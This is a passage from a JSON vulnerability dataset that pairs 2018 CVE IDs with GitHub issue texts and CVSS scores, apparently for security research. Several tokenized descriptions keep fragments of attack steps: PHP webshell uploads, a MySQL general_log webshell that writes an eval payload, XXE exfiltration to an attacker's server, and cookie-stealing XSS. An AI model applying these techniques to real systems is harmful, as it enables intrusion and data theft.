  27668. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/506",
  27669. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/506",
  27670. "Repo_new": "trippo/responsivefilemanager",
  27671. "Issue_Created_At": "2018-10-30T09:42:28Z",
  27672. "description": "SSRF not been fully fixed in FILETAG . In FILETAG we can download a pic in remote server. code in line NUMBERTAG Jul NUMBERTAG commit a fix to limit url in order to prohibit ssrf vuln CVETAG CVETAG but the fix only check the parm url startwith http:// or https:// we still can use http protocol to Probe intranet and attack intarnet APITAG Example: CODETAG and when the port is open will response APITAG URL\"} FILETAG",
  27673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  27674. "severity": "HIGH",
  27675. "baseScore": 8.6,
  27676. "impactScore": 4.0,
  27677. "exploitabilityScore": 3.9
  27678. },
  27679. {
  27680. "CVE_ID": "CVE-2018-18873",
  27681. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/184",
  27682. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/184",
  27683. "Repo_new": "jasper-software/jasper",
  27684. "Issue_Created_At": "2018-10-31T06:55:17Z",
  27685. "description": "NULL pointer dereference was discovered. An issue was discovered in Jasper NUMBERTAG There is a NULL pointer dereference at function ras_putdatastd CODETAG At the site of data define , the value of \"numcmpts\" is NUMBERTAG ERRORTAG FILETAG",
  27686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27687. "severity": "MEDIUM",
  27688. "baseScore": 5.5,
  27689. "impactScore": 3.6,
  27690. "exploitabilityScore": 1.8
  27691. },
  27692. {
  27693. "CVE_ID": "CVE-2018-18874",
  27694. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/11",
  27695. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/11",
  27696. "Repo_new": "gnat/nc-cms",
  27697. "Issue_Created_At": "2018-10-31T07:07:54Z",
  27698. "description": "There is an upload vulnerability in the edit html that can upload any files(eg:php webshell). Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can upload any evil file js you want NUMBERTAG click \"upfile or image\" FILETAG NUMBERTAG select a php file (eg: a evil webshell) FILETAG upload success! FILETAG the path: PATHTAG webshell : FILETAG FILETAG login webshell FILETAG FILETAG",
  27699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27700. "severity": "CRITICAL",
  27701. "baseScore": 9.8,
  27702. "impactScore": 5.9,
  27703. "exploitabilityScore": 3.9
  27704. },
  27705. {
  27706. "CVE_ID": "CVE-2018-18888",
  27707. "Issue_Url_old": "https://github.com/Leslie1sMe/laravelCMS/issues/4",
  27708. "Issue_Url_new": "https://github.com/leslie1sme/laravelcms/issues/4",
  27709. "Repo_new": "Leslie1sMe/laravelCMS",
  27710. "Issue_Created_At": "2018-10-30T15:19:58Z",
  27711. "description": "There are a File upload vulnerability allows attackers to upload PHP back door files. Vulnerability code at PATHTAG at line NUMBERTAG ERRORTAG The program uses some unreliable functions to judge whether it is a picture file or not. But the problem is Users can modify file attributes by truncating data. fix suggestion NUMBERTAG usr APITAG or \"===\"compare with file extension name APITAG files when saving files. The naming rule of file names uses time stamp to splice the MD5 value of random APITAG",
  27712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27713. "severity": "CRITICAL",
  27714. "baseScore": 9.8,
  27715. "impactScore": 5.9,
  27716. "exploitabilityScore": 3.9
  27717. },
  27718. {
  27719. "CVE_ID": "CVE-2018-18909",
  27720. "Issue_Url_old": "https://github.com/yaniswang/xhEditor/issues/37",
  27721. "Issue_Url_new": "https://github.com/yaniswang/xheditor/issues/37",
  27722. "Repo_new": "yaniswang/xheditor",
  27723. "Issue_Created_At": "2018-11-03T04:57:52Z",
  27724. "description": "XSS vulnerability in source code view. The editor's source code view allows attacker to bypass the input validation in default view by injecting javascript using IFRAME element. Proof of Concept: Injected the the payload APITAG APITAG into the editor's source code view.",
  27725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27726. "severity": "MEDIUM",
  27727. "baseScore": 6.1,
  27728. "impactScore": 2.7,
  27729. "exploitabilityScore": 2.8
  27730. },
  27731. {
  27732. "CVE_ID": "CVE-2018-18915",
  27733. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/511",
  27734. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/511",
  27735. "Repo_new": "exiv2/exiv2",
  27736. "Issue_Created_At": "2018-11-02T07:43:09Z",
  27737. "description": "Infinite loop in APITAG function of APITAG The issue may be similar to the issue NUMBERTAG with the POC file provided, The vulue of the start will always be APITAG , so the condition will be true all the time. APITAG or the command APITAG can trigger the situation: CODETAG",
  27738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27739. "severity": "MEDIUM",
  27740. "baseScore": 6.5,
  27741. "impactScore": 3.6,
  27742. "exploitabilityScore": 2.8
  27743. },
  27744. {
  27745. "CVE_ID": "CVE-2018-18919",
  27746. "Issue_Url_old": "https://github.com/JaxsonWang/WP-Editor.md/issues/275",
  27747. "Issue_Url_new": "https://github.com/lurenjiasworld/wp-editor.md/issues/275",
  27748. "Repo_new": "lurenjiasworld/wp-editor.md",
  27749. "Issue_Created_At": "2018-10-31T08:42:01Z",
  27750. "description": "WP FILETAG exists XSS vulnerability. Vulnerability description When commentaries open markdown, administrators and editor roles can trigger XSS. Proof of concept First, open the comment area markdown \u63d2\u4ef6(plug in) APITAG NUMBERTAG md]( FILETAG FILETAG APITAG checked APITAG APITAG FILETAG FILETAG APITAG Second, log in with the administrator or editor role and comment in the comment APITAG payload used is: >[ FILETAG \"> APITAG alert NUMBERTAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Third, visit the comment page. You will find that the page has successfully executed the JS code NUMBERTAG URLTAG FILETAG NUMBERTAG Exploit Deploying FILETAG on attacker FILETAG content is the JS code you want to execute. >[ FILETAG \"> APITAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Test using JS code that gets cookie NUMBERTAG URLTAG FILETAG NUMBERTAG Successfully acquire part of cookie XD",
  27751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27752. "severity": "MEDIUM",
  27753. "baseScore": 4.8,
  27754. "impactScore": 2.7,
  27755. "exploitabilityScore": 1.7
  27756. },
  27757. {
  27758. "CVE_ID": "CVE-2018-18920",
  27759. "Issue_Url_old": "https://github.com/ethereum/py-evm/issues/1448",
  27760. "Issue_Url_new": "https://github.com/ethereum/py-evm/issues/1448",
  27761. "Repo_new": "ethereum/py-evm",
  27762. "Issue_Created_At": "2018-11-01T07:53:25Z",
  27763. "description": "Invalid values like NUMBERTAG occurs in Stack during the execution.. What is wrong? When we executing our contract via py evm, we find there are strange values occur in stack, and they cause the execution ended in INVALID opcode. just run APITAG with default settings, and the APITAG output APITAG : \"stack NUMBERTAG the correct value should be byte str like b'\\x' Just want to ask if someone has already figured out this issue and what are the main concerns here. Thanks a lot.",
  27764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27765. "severity": "HIGH",
  27766. "baseScore": 8.8,
  27767. "impactScore": 5.9,
  27768. "exploitabilityScore": 2.8
  27769. },
  27770. {
  27771. "CVE_ID": "CVE-2018-18921",
  27772. "Issue_Url_old": "https://github.com/phpservermon/phpservermon/issues/670",
  27773. "Issue_Url_new": "https://github.com/phpservermon/phpservermon/issues/670",
  27774. "Repo_new": "phpservermon/phpservermon",
  27775. "Issue_Created_At": "2018-10-30T15:37:17Z",
  27776. "description": "[SECURITY] Discovered vulnerability. Hi, Please, how can I report a vulnerability? regards",
  27777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  27778. "severity": "MEDIUM",
  27779. "baseScore": 6.5,
  27780. "impactScore": 3.6,
  27781. "exploitabilityScore": 2.8
  27782. },
  27783. {
  27784. "CVE_ID": "CVE-2018-18925",
  27785. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5469",
  27786. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5469",
  27787. "Repo_new": "gogs/gogs",
  27788. "Issue_Created_At": "2018-10-22T08:02:47Z",
  27789. "description": "gogs remote command execution. Gogs version (or commit ref): newest( URLTAG Can you reproduce the bug at FILETAG [ x] Yes (provide example URL) [ ] No [ ] Not relevant Description I can login to arbitrary account. And when I logged in as admin, I can execute any command by git hooks. I just tried login to Unknown's account but do not perform command execution. APITAG APITAG As this is a very severe issue, I won't post details here. MENTIONTAG can you give me your email address and I send the details to you?",
  27790. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27791. "severity": "CRITICAL",
  27792. "baseScore": 9.8,
  27793. "impactScore": 5.9,
  27794. "exploitabilityScore": 3.9
  27795. },
  27796. {
  27797. "CVE_ID": "CVE-2018-18926",
  27798. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/5140",
  27799. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/5140",
  27800. "Repo_new": "go-gitea/gitea",
  27801. "Issue_Created_At": "2018-10-22T15:14:26Z",
  27802. "description": "gitea remote command execution with default installation. Gitea version (or commit ref): current ( URLTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ x] No [ ] Not relevant Description Hi, I found a issue just like URLTAG With gitea's default installation, I can authenticate as arbitrary account. But due to some server configuration, I can't reproduce in FILETAG . As this is a very severe issue, I won't post details here. Can you give me your email address and I send the details to you?",
  27803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27804. "severity": "CRITICAL",
  27805. "baseScore": 9.8,
  27806. "impactScore": 5.9,
  27807. "exploitabilityScore": 3.9
  27808. },
  27809. {
  27810. "CVE_ID": "CVE-2018-18934",
  27811. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/13",
  27812. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/13",
  27813. "Repo_new": "popojicms/popojicms",
  27814. "Issue_Created_At": "2018-10-30T15:07:52Z",
  27815. "description": "I found a CSRF vulnerability that can getshell. ERRORTAG \u540e\u53f0\u4e0a\u4f20\u9875\u9762\u5e76\u6ca1\u6709CSRF\u9632\u62a4\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020poc ERRORTAG \u7136\u540e\u53d1\u9001\u7ed9\u7ba1\u7406\u5458\u94fe\u63a5\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5getshell.",
  27816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27817. "severity": "CRITICAL",
  27818. "baseScore": 9.8,
  27819. "impactScore": 5.9,
  27820. "exploitabilityScore": 3.9
  27821. },
  27822. {
  27823. "CVE_ID": "CVE-2018-18934",
  27824. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/12",
  27825. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/12",
  27826. "Repo_new": "popojicms/popojicms",
  27827. "Issue_Created_At": "2018-10-30T15:06:29Z",
  27828. "description": "I found that the background can getshell. Background GETCHELL Description: The background can upload a compressed package, uncompressed without filtering, and getshell. Put a webshell in the archive and upload it. APITAG FILETAG Then we can access the corresponding directory to getshell. Code analysis See line NUMBERTAG of FILETAG ERRORTAG Only judge whether the upload is a zip archive, if it is directly decompressed, the directory to be extracted is APITAG",
  27829. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27830. "severity": "CRITICAL",
  27831. "baseScore": 9.8,
  27832. "impactScore": 5.9,
  27833. "exploitabilityScore": 3.9
  27834. },
  27835. {
  27836. "CVE_ID": "CVE-2018-18935",
  27837. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/14",
  27838. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/14",
  27839. "Repo_new": "popojicms/popojicms",
  27840. "Issue_Created_At": "2018-10-30T15:09:18Z",
  27841. "description": "I found a CSRF vulnerability that can add a super administrator account directly. ERRORTAG APITAG CODETAG \u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664",
  27842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27843. "severity": "HIGH",
  27844. "baseScore": 8.8,
  27845. "impactScore": 5.9,
  27846. "exploitabilityScore": 2.8
  27847. },
  27848. {
  27849. "CVE_ID": "CVE-2018-18936",
  27850. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/15",
  27851. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/15",
  27852. "Repo_new": "popojicms/popojicms",
  27853. "Issue_Created_At": "2018-10-30T15:10:54Z",
  27854. "description": "I found a background arbitrary file deletion vulnerability. ERRORTAG Vulnerability analysis: Look at line NUMBERTAG of the code FILETAG ERRORTAG You can see that you want to delete the image. If it is not the image, it will be deleted. Then we can delete any file across the directory.",
  27855. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27856. "severity": "HIGH",
  27857. "baseScore": 7.5,
  27858. "impactScore": 3.6,
  27859. "exploitabilityScore": 3.9
  27860. },
  27861. {
  27862. "CVE_ID": "CVE-2018-18937",
  27863. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/82",
  27864. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/82",
  27865. "Repo_new": "mz-automation/libiec61850",
  27866. "Issue_Created_At": "2018-11-03T06:19:20Z",
  27867. "description": "SEGV in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I run the APITAG in directory APITAG by command APITAG so that the server is set up. Then I tested APITAG in directory APITAG by command APITAG . But I got SEGV in function APITAG in APITAG . This is the ASAN information: ERRORTAG",
  27868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27869. "severity": "HIGH",
  27870. "baseScore": 7.5,
  27871. "impactScore": 3.6,
  27872. "exploitabilityScore": 3.9
  27873. },
  27874. {
  27875. "CVE_ID": "CVE-2018-18939",
  27876. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/159",
  27877. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/159",
  27878. "Repo_new": "wuzhicms/wuzhicms",
  27879. "Issue_Created_At": "2018-11-01T03:32:16Z",
  27880. "description": "There is a stored xss vulnerability. An issue was discovered in wuzhicms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and view homepage FILETAG",
  27881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27882. "severity": "MEDIUM",
  27883. "baseScore": 4.8,
  27884. "impactScore": 2.7,
  27885. "exploitabilityScore": 1.7
  27886. },
  27887. {
  27888. "CVE_ID": "CVE-2018-18942",
  27889. "Issue_Url_old": "https://github.com/baserproject/basercms/issues/959",
  27890. "Issue_Url_new": "https://github.com/baserproject/basercms/issues/959",
  27891. "Repo_new": "baserproject/basercms",
  27892. "Issue_Created_At": "2018-09-19T02:43:04Z",
  27893. "description": "Code Execution Vulnerability. Hello\uff1a I found an arbitrary file upload vulnerability in basercms. Can lead to remote code execution. Can you provide an email address? I will give you my report. thank you!",
  27894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27895. "severity": "HIGH",
  27896. "baseScore": 7.2,
  27897. "impactScore": 5.9,
  27898. "exploitabilityScore": 1.2
  27899. },
  27900. {
  27901. "CVE_ID": "CVE-2018-18950",
  27902. "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/289",
  27903. "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/289",
  27904. "Repo_new": "kindsoft/kindeditor",
  27905. "Issue_Created_At": "2018-11-02T09:57:46Z",
  27906. "description": "Path Traversal vulnerability in APITAG ver NUMBERTAG Hello, The APITAG NUMBERTAG have path traversal vulnerability specifically in PATHTAG Anyone can browse the file or directory in PATHTAG folder via \u201cpath\u201d parameter without authentication. Through this method the unauthorized user can quickly view on the target host all uploaded files and exposed sensitive information. Example NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG",
  27907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  27908. "severity": "HIGH",
  27909. "baseScore": 7.5,
  27910. "impactScore": 3.6,
  27911. "exploitabilityScore": 3.9
  27912. },
  27913. {
  27914. "CVE_ID": "CVE-2018-18957",
  27915. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/83",
  27916. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/83",
  27917. "Repo_new": "mz-automation/libiec61850",
  27918. "Issue_Created_At": "2018-11-05T18:08:57Z",
  27919. "description": "Stack smashing. Summary A stack smashing was detected in FILETAG Steps to reproduce ERRORTAG APITAG URLTAG APITAG file will be expired after NUMBERTAG days.] Debugging ERRORTAG",
  27920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27921. "severity": "CRITICAL",
  27922. "baseScore": 9.8,
  27923. "impactScore": 5.9,
  27924. "exploitabilityScore": 3.9
  27925. },
  27926. {
  27927. "CVE_ID": "CVE-2018-18980",
  27928. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/5",
  27929. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/5",
  27930. "Repo_new": "x-f1v3/forcve",
  27931. "Issue_Created_At": "2018-10-30T15:13:45Z",
  27932. "description": "Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability. Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn A XML External Entity injection(XXE) vulnerability exists in Zoho APITAG Network Configuration Manager NUMBERTAG ia the APITAG parameter in a APITAG GET request. My vps\u2019s FILETAG APITAG FILETAG I used the Ftp protocol to read file, it can read the file FILETAG . The FILETAG is just for test. FILETAG Then i used the poc to request my vps\u2019s FILETAG . APITAG The vulnerability exists in the APITAG ,so i tested it by the poc which was urlencoded. CODETAG In my vps ,i used the python script to open ftp protocol for accepting data FILETAG When i sent the request , I accepted the content of FILETAG in my vps. FILETAG FILETAG",
  27933. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27934. "severity": "HIGH",
  27935. "baseScore": 7.5,
  27936. "impactScore": 3.6,
  27937. "exploitabilityScore": 3.9
  27938. },
  27939. {
  27940. "CVE_ID": "CVE-2018-19044",
  27941. "Issue_Url_old": "https://github.com/acassen/keepalived/issues/1048",
  27942. "Issue_Url_new": "https://github.com/acassen/keepalived/issues/1048",
  27943. "Repo_new": "acassen/keepalived",
  27944. "Issue_Created_At": "2018-10-25T15:14:03Z",
  27945. "description": "Dbus interface allows overwriting arbitrary files and insecure permissions are used. Users can overwrite arbitrary files if APITAG or APITAG is invoked and fs.protected_symlinks is NUMBERTAG Reproducer: user: johannes APITAG NUMBERTAG tl:~> ls lah /passwd rw r r NUMBERTAG root root NUMBERTAG K Oct NUMBERTAG passwd johannes APITAG NUMBERTAG tl:~> head n NUMBERTAG passwd APITAG jobs PATHTAG johannes APITAG NUMBERTAG tl:~> ln s /passwd APITAG root: fs.protected_symlinks NUMBERTAG busctl call APITAG PATHTAG APITAG APITAG head n1 /passwd < Global definitions > APITAG and APITAG is also created mode NUMBERTAG so information can leak/be modified to/by unprivileged users",
  27946. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  27947. "severity": "MEDIUM",
  27948. "baseScore": 4.7,
  27949. "impactScore": 3.6,
  27950. "exploitabilityScore": 1.0
  27951. },
  27952. {
  27953. "CVE_ID": "CVE-2018-19047",
  27954. "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/867",
  27955. "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/867",
  27956. "Repo_new": "mpdf/mpdf",
  27957. "Issue_Created_At": "2018-09-26T12:41:37Z",
  27958. "description": "hello,I find a security bug of mpdf. Hello, when I was do some security test. I found a vulnerability that may lead to ssrf of the server which host a html2pdf service with mPDF. The poc is as follow: APITAG APITAG world! APITAG '); $mpdf APITAG APITAG APITAG '); $mpdf APITAG the another server APITAG will get a request from above In real scenario the poc may be sent from font end . so attacker will send this to server side and trigger a SSRF bug which may lead to attack private network mPDF version NUMBERTAG OS:UBUNTU NUMBERTAG",
  27959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  27960. "severity": "CRITICAL",
  27961. "baseScore": 10.0,
  27962. "impactScore": 6.0,
  27963. "exploitabilityScore": 3.9
  27964. },
  27965. {
  27966. "CVE_ID": "CVE-2018-19053",
  27967. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/2",
  27968. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/2",
  27969. "Repo_new": "pbootcms/pbootcms",
  27970. "Issue_Created_At": "2018-11-06T12:59:30Z",
  27971. "description": "Pbootcms NUMBERTAG background execution sql statement getshell vulnerability, database management module + mysql GLOBAL general_log. There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log APITAG version NUMBERTAG APITAG default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG APITAG FILETAG in the browser and enter the account password to enter the background.. username=admin password NUMBERTAG FILETAG URLTAG Can get the absolute path of the server FILETAG PATHTAG Database management module URLTAG FILETAG Here you can enter any sql statement\uff0c Use mysql GLOBAL general_log write webshell NUMBERTAG SET GLOBAL general_log = 'On'; FILETAG APITAG the log file path SET GLOBAL general_log_file = PATHTAG FILETAG APITAG a select statement with a sentence webshell select <?php eval($_POST FILETAG FILETAG FILETAG The webshell has been written to the log file FILETAG Connect to webshell using china chopper FILETAG APITAG write to webshell via export file\uff0c because mysql defaults to secure file priv",
  27972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27973. "severity": "HIGH",
  27974. "baseScore": 7.2,
  27975. "impactScore": 5.9,
  27976. "exploitabilityScore": 1.2
  27977. },
  27978. {
  27979. "CVE_ID": "CVE-2018-19056",
  27980. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/634",
  27981. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/634",
  27982. "Repo_new": "pandao/editor.md",
  27983. "Issue_Created_At": "2018-11-07T07:36:54Z",
  27984. "description": "XSS vulnerability in APITAG label . this APITAG label will cause dom based XSS. if you type APITAG FILETAG which will create a link. when user click it, it will send infomation to attack.",
  27985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27986. "severity": "MEDIUM",
  27987. "baseScore": 6.1,
  27988. "impactScore": 2.7,
  27989. "exploitabilityScore": 2.8
  27990. },
  27991. {
  27992. "CVE_ID": "CVE-2018-19057",
  27993. "Issue_Url_old": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
  27994. "Issue_Url_new": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
  27995. "Repo_new": "sparksuite/simplemde-markdown-editor",
  27996. "Issue_Created_At": "2018-11-07T08:08:10Z",
  27997. "description": "there was a xss both in img and a label. when We enter some strings,such as: ERRORTAG or you can use APITAG The editor will execute XSS payload When others use this editor, it is easy to get administrator rights by using XSS attack.",
  27998. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27999. "severity": "MEDIUM",
  28000. "baseScore": 6.1,
  28001. "impactScore": 2.7,
  28002. "exploitabilityScore": 2.8
  28003. },
  28004. {
  28005. "CVE_ID": "CVE-2018-19089",
  28006. "Issue_Url_old": "https://github.com/xujeff/tianti/issues/27",
  28007. "Issue_Url_new": "https://github.com/xujeff/tianti/issues/27",
  28008. "Repo_new": "xujeff/tianti",
  28009. "Issue_Created_At": "2018-11-07T13:57:07Z",
  28010. "description": "There are some XSS flaws in your project. Hello\uff0cguy\uff0ci'm sorry to tell you that your project has so many XSS flaws. first of all,the userlist module exists a storage type XSS\uff0cwhich will cause cookie Disclosure and Escalation of Privileges. the following picture is the proof of this flaws\uff1a FILETAG FILETAG the following is the descripment of this flaws according to the leak of the code. FILETAG the path of this pice of code is PATHTAG FILETAG received the value from \"controller\" and displace it without any defensive measures. that check the check the code of the \"controller\". here is the usercontroller,and we can get the request parameters from users FILETAG and it put the userinfo to the User APITAG object will be return to the \"view\",by ajax method. and we can see,there doesn't exits any defensive measures. FILETAG and secondly, in the article management mudle,there also exists a storage type xss. the following picture is the proof of this flaws: FILETAG and the following the is entry of the flaws FILETAG and thirdly,in the usermanagement mudle,there exists a reflect xss. this functional mudle is created to check the userinfo through the keyword of the user entered. FILETAG Hope you guy fix the flaws quickly,if you have some questions,please contact me with the following e mail address: EMAILTAG",
  28011. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28012. "severity": "MEDIUM",
  28013. "baseScore": 5.4,
  28014. "impactScore": 2.7,
  28015. "exploitabilityScore": 2.3
  28016. },
  28017. {
  28018. "CVE_ID": "CVE-2018-19092",
  28019. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/7",
  28020. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/7",
  28021. "Repo_new": "yzmcms/yzmcms",
  28022. "Issue_Created_At": "2018-11-07T12:19:43Z",
  28023. "description": "yzmcms NUMBERTAG SS. FILETAG XSS payload: URLTAG POC: GET PATHTAG NUMBERTAG c NUMBERTAG fscript NUMBERTAG er6qt NUMBERTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: FILETAG Cookie: APITAG FILETAG",
  28024. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28025. "severity": "MEDIUM",
  28026. "baseScore": 6.1,
  28027. "impactScore": 2.7,
  28028. "exploitabilityScore": 2.8
  28029. },
  28030. {
  28031. "CVE_ID": "CVE-2018-19093",
  28032. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/84",
  28033. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/84",
  28034. "Repo_new": "mz-automation/libiec61850",
  28035. "Issue_Created_At": "2018-11-07T16:41:29Z",
  28036. "description": "SEGV in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I run the APITAG in directory APITAG by command APITAG so that the server is set up. Then I tested APITAG in directory APITAG by command APITAG . But I got SEGV in function APITAG in APITAG . This is the ASAN information: ERRORTAG",
  28037. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28038. "severity": "HIGH",
  28039. "baseScore": 7.5,
  28040. "impactScore": 3.6,
  28041. "exploitabilityScore": 3.9
  28042. },
  28043. {
  28044. "CVE_ID": "CVE-2018-19104",
  28045. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/3",
  28046. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/3",
  28047. "Repo_new": "bagesoft/bagecms",
  28048. "Issue_Created_At": "2018-11-08T01:51:36Z",
  28049. "description": "There is a CSRF vulnerability that can be used to upload arbitrary files and get server privileges.. FILETAG When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28050. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28051. "severity": "HIGH",
  28052. "baseScore": 8.8,
  28053. "impactScore": 5.9,
  28054. "exploitabilityScore": 2.8
  28055. },
  28056. {
  28057. "CVE_ID": "CVE-2018-19107",
  28058. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/427",
  28059. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/427",
  28060. "Repo_new": "exiv2/exiv2",
  28061. "Issue_Created_At": "2018-09-01T05:37:20Z",
  28062. "description": "APITAG heap buffer overflow at APITAG When running APITAG NUMBERTAG c6f) against psd files, , ASAN reports a heap buffer overflow error. POCs: URLTAG URLTAG ASAN output: ERRORTAG",
  28063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28064. "severity": "MEDIUM",
  28065. "baseScore": 6.5,
  28066. "impactScore": 3.6,
  28067. "exploitabilityScore": 2.8
  28068. },
  28069. {
  28070. "CVE_ID": "CVE-2018-19108",
  28071. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/426",
  28072. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/426",
  28073. "Repo_new": "exiv2/exiv2",
  28074. "Issue_Created_At": "2018-08-31T13:49:18Z",
